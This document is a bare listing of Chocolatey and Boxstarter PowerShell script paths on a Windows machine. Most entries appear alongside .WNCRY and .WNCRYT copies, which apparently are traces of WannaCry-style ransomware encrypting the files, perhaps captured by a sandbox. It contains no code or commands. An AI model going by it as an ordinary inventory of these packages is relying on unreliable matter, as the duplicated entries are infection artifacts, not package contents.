C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRY
